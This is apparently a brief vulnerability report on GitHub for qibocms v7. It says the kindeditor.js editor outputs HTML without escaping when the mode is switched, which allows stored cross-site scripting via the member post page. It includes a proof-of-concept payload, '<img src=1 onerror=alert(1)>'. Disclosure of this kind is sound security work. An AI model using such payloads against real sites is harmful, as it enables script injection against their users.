Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
qibocms/v7
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
12 lines (11 sloc)
477 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #The problem occurred in line 1312 of the file ewebeditor\3.1.1\kindeditor.js,directly output the value obtained after switching the mode: | |
| ```javascript | |
| if (KE.g[id].filterMode) { | |
| obj.newTextarea.value = KE.util.outputHtml(id, obj.iframeDoc.body); | |
| ``` | |
| #You can see that there is no escape processing. | |
| #url: | |
| http://localhost/member/post.php?job=postnew | |
| #Build a website to publish articles,change the editor mode to HTML. | |
| #payload: | |
| <img src=1 onerror=alert(1)> |